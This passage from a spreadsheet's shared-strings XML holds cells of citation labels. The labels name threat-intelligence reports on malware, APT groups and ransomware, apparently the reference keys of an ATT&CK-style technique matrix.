    <t>(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: TrendMicro MacOS April 2018),(Citation: CISA AppleJeus Feb 2021),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: trendmicro xcsset xcode project 2020),(Citation: sentinelone apt32 macOS backdoor 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: wardle evilquest parti),(Citation: ESET LoudMiner June 2019),(Citation: ObjectiveSee AppleJeus 2019),(Citation: TrendMicro macOS Dacls May 2020),</t>
  </si>
  <si>
    <t>(Citation: Anomali Rocke March 2019),(Citation: ANSSI Sandworm January 2021),(Citation: Fysbis Dr Web Analysis),(Citation: GitHub Pupy),(Citation: Unit 42 Hildegard Malware),(Citation: ESET TeleBots Oct 2018),(Citation: Cisco Talos Intelligence Group),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: Symantec Naid June 2012),(Citation: Check Point Sunburst Teardrop December 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Palo Alto Reaver Nov 2017),(Citation: Talos ZxShell Oct 2014),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Lotus Blossom Jun 2015),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: Symantec Briba May 2012),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Unit 42 Shamoon3 2018),(Citation: Dragos Crashoverride 2017),(Citation: TrendMicro Lazarus Nov 2018),(Citation: ESET OceanLotus),(Citation: PWC KeyBoys Feb 2017),(Citation: Cylance Shell Crew Feb 2017),(Citation: F-Secure BlackEnergy 2014),(Citation: TrendMicro EarthLusca 2022),(Citation: Crowdstrike Indrik November 2018),(Citation: Mandiant APT1 Appendix),(Citation: ESET Gelsemium June 2021),(Citation: Microsoft FinFisher March 2018),(Citation: Symantec Dyre June 2015),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: Kaspersky Carbanak),(Citation: TrendMicro PE_URSNIF.A2),(Citation: Dell Lateral Movement),(Citation: RedCanary Mockingbird May 2020),(Citation: ESET TeleBots Oct 2018),(Citation: Cylance Cleaver),(Citation: Sophos Ragnar May 2020),(Citation: Symantec Darkmoon Aug 2005),(Citation: McAfee Bankshot),(Citation: PowerSploit Documentation),(Citation: Bitdefender StrongPity June 2020),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Nccgroup Gh0st April 2018),(Citation: Symantec Nerex May 2012),(Citation: Talos Promethium June 2020),(Citation: Dell Sakula),(Citation: Palo Alto Networks BBSRAT),(Citation: F-Secure Cosmicduke),(Citation: CISA AppleJeus Feb 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: McAfee Night Dragon),(Citation: Symantec Catchamas April 2018),(Citation: CyberBit Dtrack),(Citation: ESET LoudMiner June 2019),(Citation: Github PowerShell Empire),(Citation: Rapid7 KeyBoy Jun 2013),(Citation: Lastline PlugX Analysis),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: Symantec Backdoor.Nidiran),(Citation: FireEye FIN7 Aug 2018),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Secureworks Emotet Nov 2018),(Citation: FireEye APT41 March 2020),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: ESET Sednit Part 1),(Citation: FireEye Operation Double Tap),(Citation: F-Secure CozyDuke),(Citation: LogRhythm WannaCry),(Citation: Symantec Hydraq Persistence Jan 2010),(Citation: Symantec Volgmer Aug 2014),(Citation: FireEye APT10 April 2017),(Citation: FinFisher Citation),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: ThreatStream Evasion Analysis),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Group IB Cobalt Aug 2017),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Emissary Trojan Feb 2016),(Citation: Kroll RawPOS Jan 2017),(Citation: Russinovich Sysinternals),(Citation: Symantec Orangeworm April 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Palo Alto MoonWind March 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: McAfee Honeybee),(Citation: SANS Conficker),(Citation: FireEye WannaCry 2017),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit42 RDAT July 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Securelist DarkVishnya Dec 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Mandiant UNC3313 Feb 2022),(Citation: ESET Carbon Mar 2017),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Group IB APT 41 June 2021),(Citation: TrendMicro RawPOS April 2015),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Securelist Kimsuky Sept 2013),(Citation: Novetta Blockbuster Destructive Malware),(Citation: ESET Attor Oct 2019),(Citation: Microsoft Wingbird Nov 2017),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Unit 42 PingPull Jun 2022),(Citation: Microsoft Winnti Jan 2017),(Citation: Bitdefender Naikon April 2021),(Citation: ASERT InnaputRAT April 2018),(Citation: McAfee Cuba April 2021),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Gh0stRAT ATT March 2019),(Citation: Novetta Blockbuster),(Citation: CISA AA20-301A Kimsuky),(Citation: Microsoft SIR Vol 21),(Citation: Symantec W32.Duqu),(Citation: FireEye APT41 Aug 2019),(Citation: Proofpoint ZeroT Feb 2017),(Citation: US-CERT Emotet Jul 2018),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Symantec Wiarp May 2012),(Citation: CIRCL PlugX March 2013),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET PipeMon May 2020),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT Bankshot Dec 2017),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Palo Alto Shamoon Nov 2016),(Citation: GitHub PowerSploit May 2012),(Citation: ESET InvisiMole June 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Malicious Driver Reporting Center),(Citation: Microsoft driver block rules)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Cybereason Kimsuky November 2020),(Citation: ESET EvilNum July 2020),(Citation: BitDefender Chafer May 2020),(Citation: GitHub Pupy),(Citation: Cybereason Astaroth Feb 2019),(Citation: ESET PLEAD Malware July 2018),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: F-Secure The Dukes),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: Volexity Patchwork June 2018),(Citation: Symantec MuddyWater Dec 2018),(Citation: Symantec Leafminer July 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: GitHub LaZagne Dec 2018),(Citation: Red Canary NETWIRE January 2020),(Citation: FireEye APT35 2018),(Citation: FireEye APT33 Guardrail),(Citation: Deply Mimikatz),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: ESET Operation Groundbait),(Citation: Symantec Elfin Mar 2019),(Citation: SecureWorks August 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: GitHub Mimikatz lsadump Module),(Citation: Trend Micro Muddy Water March 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: NCSC Joint Report Public Tools),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Visa FIN6 Feb 2019),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Prevx Carberp March 2011),(Citation: CopyKittens Nov 2015),(Citation: FireEye APT34 July 2019),(Citation: GitHub QuasarRAT),(Citation: Infoblox Lokibot January 2019),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Secureworks Karagany July 2019),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: Volexity Patchwork June 2018),(Citation: Trend Micro njRAT 2018),(Citation: Talos Olympic Destroyer 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: F-Secure BlackEnergy 2014),(Citation: Talos PoetRAT April 2020),(Citation: FireEye APT33 Guardrail),(Citation: Unit42 Azorult Nov 2018),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Trend Micro Emotet Jan 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: Fidelis njRAT June 2013),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: objsee mac malware 2017),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: FireEye NETWIRE March 2019),(Citation: Check Point Rocket Kitten),(Citation: GitHub Pupy),(Citation: Symantec Leafminer July 2018),(Citation: Bitdefender Agent Tesla April 2020),(Citation: IBM Grandoreiro April 2020),(Citation: FireEye APT35 2018),(Citation: Github PowerShell Empire),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Symantec Inception Framework March 2018),(Citation: Rapid7 KeyBoy Jun 2013),(Citation: ESET Operation Groundbait),(Citation: Symantec Elfin Mar 2019),(Citation: JPCert TSCookie March 2018),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: FireEye APT37 Feb 2018),(Citation: BiZone Lizar May 2021),(Citation: FireEye APT34 July 2019),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: XAgentOSX 2017),(Citation: ESET Zebrocy May 2019),(Citation: Symantec MuddyWater Dec 2018),(Citation: Talos Group123),(Citation: Cisco H1N1 Part 2),(Citation: Accenture Hogfish April 2018),(Citation: ESET Telebots Dec 2016),(Citation: Talos Kimsuky Nov 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Deply Mimikatz),(Citation: Zdnet Kimsuky Dec 2018),(Citation: Talos Konni May 2017),(Citation: ESET Machete July 2019),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Check Point Warzone Feb 2020),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Mandiant UNC3890 Aug 2022),(Citation: NCSC Joint Report Public Tools),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Proofpoint TA505 Sep 2017),(Citation: Cymmetria Patchwork),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Citizen Lab Group5),(Citation: Symantec Buckeye),(Citation: Trend Micro Trickbot Nov 2018),(Citation: GitHub QuasarRAT),(Citation: Symantec Dragonfly),(Citation: TrendMicro BlackTech June 2017),(Citation: Cybereason Kimsuky November 2020),(Citation: Bitdefender Naikon April 2021),(Citation: ESET PLEAD Malware July 2018),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: F-Secure The Dukes),(Citation: CISA AA20-301A Kimsuky),(Citation: DustySky),(Citation: Kaspersky Lyceum October 2021),(Citation: GitHub LaZagne Dec 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: Kaspersky Adwind Feb 2016),(Citation: IBM IcedID November 2017),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: GitHub Mimikatz lsadump Module),(Citation: Trend Micro Muddy Water March 2021),(Citation: Proofpoint NETWIRE December 2020),(Citation: Cyberreason Anchor December 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Prevx Carberp March 2011),(Citation: Forcepoint Monsoon),(Citation: Infoblox Lokibot January 2019),</t>
  </si>
  <si>
    <t>(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Symantec Calisto July 2018),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Securelist Calisto July 2018),(Citation: GitHub LaZagne Dec 2018),(Citation: ESET DazzleSpy Jan 2022),(Citation: objsee mac malware 2017),</t>
  </si>
  <si>
    <t>(Citation: Cyberreason Anchor December 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: objsee mac malware 2017),(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>(Citation: synack 2016 review),</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020),(Citation: PowerSploit Documentation),(Citation: Bitdefender Naikon April 2021),(Citation: SentinelOne Valak June 2020),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: GitHub PowerSploit May 2012),(Citation: GitHub LaZagne Dec 2018),(Citation: BiZone Lizar May 2021),(Citation: Talos Group123),(Citation: Symantec Waterbug Jun 2019),(Citation: FireEye APT34 July 2019),(Citation: Delpy Mimikatz Crendential Manager),(Citation: Microsoft Network access Credential Manager)</t>
  </si>
  <si>
    <t>(Citation: Cisco CaddyWiper March 2022),(Citation: Securelist BlackEnergy Feb 2015),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Microsoft SDelete July 2016),(Citation: McAfee GhostSecret),(Citation: Symantec Shamoon 2012),(Citation: ESET Hermetic Wizard March 2022),(Citation: Novetta Blockbuster),(Citation: Unit 42 Shamoon3 2018),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Dragos Crashoverride 2017),(Citation: Secureworks REvil September 2019),(Citation: Talos Olympic Destroyer 2018),(Citation: Medium S2W WhisperGate January 2022),(Citation: Microsoft WhisperGate January 2022),(Citation: FireEye Shamoon Nov 2016),(Citation: Kaspersky StoneDrill 2017),(Citation: Check Point Meteor Aug 2021),(Citation: Fortinet Diavol July 2021),(Citation: Intel 471 REvil March 2020),(Citation: US-CERT Ukraine Feb 2016),(Citation: ESET CaddyWiper March 2022),(Citation: Unit 42 WhisperGate January 2022),(Citation: Picus Sodinokibi January 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Unit 42 Kazuar May 2017),(Citation: ESET BlackEnergy Jan 2016),(Citation: FireEye APT38 Oct 2018),(Citation: CERT-EE Gamaredon January 2021),(Citation: Kaspersky Sodin July 2019),(Citation: ESEST Black Energy Jan 2016),(Citation: ESET Telebots June 2017),(Citation: McAfee Shamoon December 2018),(Citation: Unit42 Xbash Sept 2018),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Volexity PowerDuke November 2016),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Cybereason WhisperGate February 2022),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: Mythc Documentation),(Citation: Cisco H1N1 Part 2),(Citation: Anomali Linux Rabbit 2018),(Citation: Forcepoint Monsoon),(Citation: ProofPoint Ursnif Aug 2016),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>(Citation: McAfee Bankshot),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: NCSC Cyclops Blink February 2022),(Citation: McAfee Oceansalt Oct 2018),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET InvisiMole June 2020),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: Unit42 RDAT July 2020),(Citation: FireEye APT30),(Citation: Securelist ShadowPad Aug 2017),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: McAfee Lazarus Nov 2020),(Citation: Check Point APT34 April 2021),(Citation: Lotus Blossom Jun 2015),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: FireEye APT33 Guardrail),(Citation: CISA WellMess July 2020),(Citation: Fysbis Dr Web Analysis),(Citation: Kaspersky Carbanak),(Citation: Unit 42 Playbook Dec 2017),(Citation: Fidelis njRAT June 2013),(Citation: Medium KONNI Jan 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Zscaler Cobian Aug 2017),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Securelist Octopus Oct 2018),(Citation: Talos Bisonal Mar 2020),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Unit 42 Valak July 2020),(Citation: ESET Operation Groundbait),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Microsoft POLONIUM June 2022),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Unit42 Molerat Mar 2020),(Citation: GitHub Sliver HTTP),(Citation: Unit42 BabyShark Feb 2019),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Forcepoint Felismus Mar 2017),(Citation: Cylance Shaheen Nov 2018),(Citation: Kaspersky Sofacy),(Citation: NTT Security Flagpro new December 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Checkpoint IndigoZebra July 2021),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: ESET Telebots Dec 2016),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky MuddyWater June 2019),(Citation: FireEye APT34 Dec 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Moran 2013),(Citation: ESET ForSSHe December 2018),(Citation: Prevailion DarkWatchman 2021),(Citation: Unit 42 Inception November 2018),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit42 RDAT July 2020),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Cymmetria Patchwork),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Crowdstrike Qakbot October 2020),(Citation: Palo Alto DNS Requests),(Citation: Symantec Dragonfly),(Citation: Antiy CERT Ramsay April 2020),(Citation: Unit 42 PingPull Jun 2022),(Citation: Unit 42 MechaFlounder March 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Gh0stRAT ATT March 2019),(Citation: Kaspersky CactusPete Aug 2020),(Citation: PaloAlto Patchwork Mar 2018),(Citation: ESET Ebury Feb 2014),(Citation: Kaspersky Lyceum October 2021),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: JPCERT ChChes Feb 2017),(Citation: Cybereason Chaes Nov 2020),(Citation: Microsoft HAFNIUM March 2020),(Citation: Trend Micro IXESHE 2012),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Unit 42 SeaDuke 2015),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Securelist Machete Aug 2014),(Citation: Palo Alto OilRig May 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: Palo Alto menuPass Feb 2017),(Citation: Unit 42 QUADAGENT July 2018),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB GrimAgent July 2021),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Cyberreason Anchor December 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Forcepoint Monsoon),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: LogRhythm WannaCry),(Citation: FireEye Maze May 2020),(Citation: Trend Micro Ransomware February 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: McAfee Cuba April 2021),(Citation: US-CERT NotPetya 2017),(Citation: Check Point Pay2Key November 2020),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: CrowdStrike Ryuk January 2019),(Citation: Wired Lockergoga 2019),(Citation: NCC Group Fivehands June 2021),(Citation: Dragos EKANS),(Citation: Unit 42 Shamoon3 2018),(Citation: Secureworks REvil September 2019),(Citation: TrendMicro Netwalker May 2020),(Citation: Cybereason Conti Jan 2021),(Citation: Cybereason Egregor Nov 2020),(Citation: trendmicro xcsset xcode project 2020),(Citation: Fortinet Diavol July 2021),(Citation: Intel 471 REvil March 2020),(Citation: Cynet Ragnar Apr 2020),(Citation: FireEye APT41 Aug 2019),(Citation: wardle evilquest partii),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: Cybleinc Conti January 2020),(Citation: Palo Alto Unit 42 EKANS),(Citation: Crowdstrike Indrik November 2018),(Citation: Carbon Black JCry May 2019),(Citation: Talos Nyetya June 2017),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: CERT-FR PYSA April 2020),(Citation: Arxiv Avaddon Feb 2021),(Citation: Cylance Sodinokibi July 2019),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Sophos SamSam Apr 2018),(Citation: KillDisk Ransomware),(Citation: Unit42 LockerGoga 2019),(Citation: ClearkSky Fox Kitten February 2020),(Citation: Picus Sodinokibi January 2020),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: FireEye WannaCry 2017),(Citation: SecureWorks WannaCry Analysis),(Citation: IBM MegaCortex),(Citation: NCC Group WastedLocker June 2020),(Citation: NHS Digital Egregor Nov 2020),(Citation: Secure List Bad Rabbit),(Citation: FireEye APT38 Oct 2018),(Citation: FireEye FiveHands April 2021),(Citation: Talos Sodinokibi April 2019),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Proofpoint TA505 Sep 2017),(Citation: Kaspersky Sodin July 2019),(Citation: Sophos Ragnar May 2020),(Citation: Unit42 Clop April 2021),(Citation: mbed-crypto),(Citation: CarbonBlack Conti July 2020),(Citation: Group IB Ransomware September 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Unit42 Xbash Sept 2018),(Citation: McAfee Babuk February 2021),(Citation: Medium Babuk February 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec WastedLocker June 2020),(Citation: CarbonBlack LockerGoga 2019),(Citation: McAfee REvil October 2019),(Citation: Mcafee Clop Aug 2019),(Citation: Cybereason Clop Dec 2020),(Citation: win10_asr),(Citation: Rhino S3 Ransomware Part 2),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>,(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019),(Citation: ESET Casbaneiro Oct 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: FireEye APT38 Oct 2018),(Citation: Securelist Brazilian Banking Malware July 2020),</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Mar 2018),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Check Point APT34 April 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Unit42 RDAT July 2020),(Citation: FoxIT Wocao December 2019),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: CISA WellMess July 2020),(Citation: Unit42 BendyBear Feb 2021),(Citation: ESET Sednit Part 3),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Kaspersky Lyceum October 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Securelist APT10 March 2021),(Citation: Dell P2P ZeuS),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: ESET PLEAD Malware July 2018),(Citation: Group IB GrimAgent July 2021),(Citation: TrendMicro BlackTech June 2017),</t>
  </si>
  <si>
    <t>(Citation: Zscaler Higaisa 2020),(Citation: US-CERT Bankshot Dec 2017),(Citation: ESET InvisiMole June 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: PWC KeyBoys Feb 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: McAfee GhostSecret),(Citation: US-CERT BADCALL),(Citation: ESET InvisiMole June 2020),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Scarlet Mimic Jan 2016),(Citation: Novetta Blockbuster),(Citation: US-CERT HARDRAIN March 2018),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: ESET Okrum July 2019),</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019),(Citation: GitHub Sliver HTTP),(Citation: Symantec W32.Duqu),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: ESET Dukes October 2019),(Citation: Novetta-Axiom),(Citation: Trend Micro Daserf Nov 2017),(Citation: Unit42 RDAT July 2020),(Citation: Proofpoint ZeroT Feb 2017),(Citation: FireEye SUNBURST Additional Details Dec 2020),(Citation: FireEye APT29),(Citation: Symantec Sunburst Sending Data January 2021),(Citation: Proofpoint TA459 April 2017),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021),(Citation: CrowdStrike Grim Spider May 2019),(Citation: ESET Kobalos Jan 2021),(Citation: ClearSky Siamesekitten August 2021),</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: Secureworks Karagany July 2019),(Citation: CISA EB Aug 2020),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: ESET Gelsemium June 2021),(Citation: ESET Crutch December 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: Unit 42 BadPatch Oct 2017),(Citation: ESET TeleBots Oct 2018),(Citation: Symantec Darkmoon Aug 2005),(Citation: TrendMicro Ursnif Mar 2015),(Citation: FireEye Periscope March 2018),(Citation: US-CERT TA18-074A),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Talos MuddyWater Jan 2022),(Citation: Symantec WastedLocker June 2020),(Citation: Talos Oblique RAT March 2021),(Citation: Avira Mustang Panda January 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Eset Ramsay May 2020),(Citation: Cylance Machete Mar 2017),(Citation: Securelist Octopus Oct 2018),(Citation: Cybereason PowerLess February 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: PWC Cloud Hopper April 2017),(Citation: Symantec Catchamas April 2018),(Citation: CyberBit Dtrack),(Citation: aptsim),(Citation: Malwarebytes Dyreza November 2015),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Unit 42 NOKKI Sept 2018),(Citation: FireEye FIN6 April 2016),(Citation: ESET Operation Groundbait),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Securelist Dtrack),(Citation: Accenture Dragonfish Jan 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: DFIR Conti Bazar Nov 2021),(Citation: ESET Zebrocy Nov 2018),(Citation: Palo Alto Rover),(Citation: Symantec Calisto July 2018),(Citation: Morphisec ShellTea June 2019),(Citation: Kaspersky Sofacy),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Cisco Talos Intelligence Group),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET LightNeuron May 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye APT30),(Citation: Kroll RawPOS Jan 2017),(Citation: Palo Alto MoonWind March 2017),(Citation: ESET Sednit USBStealer 2014),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Machete July 2019),(Citation: McAfee Honeybee),(Citation: ATT Sidewinder January 2021),(Citation: Novetta Blockbuster Loaders),(Citation: Unit 42 Kazuar May 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Mandiant UNC3313 Feb 2022),(Citation: ESET Carbon Mar 2017),(Citation: FireEye TRITON 2019),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: Symantec Dragonfly),(Citation: Antiy CERT Ramsay April 2020),(Citation: Cybereason Kimsuky November 2020),(Citation: Bitdefender Naikon April 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Kroll Qakbot June 2020),(Citation: Novetta Blockbuster),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: CISA AA20-301A Kimsuky),(Citation: Talos NavRAT May 2018),(Citation: Securelist Calisto July 2018),(Citation: Symantec W32.Duqu),(Citation: Objective-See MacMa Nov 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: Microsoft SIR Vol 19),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
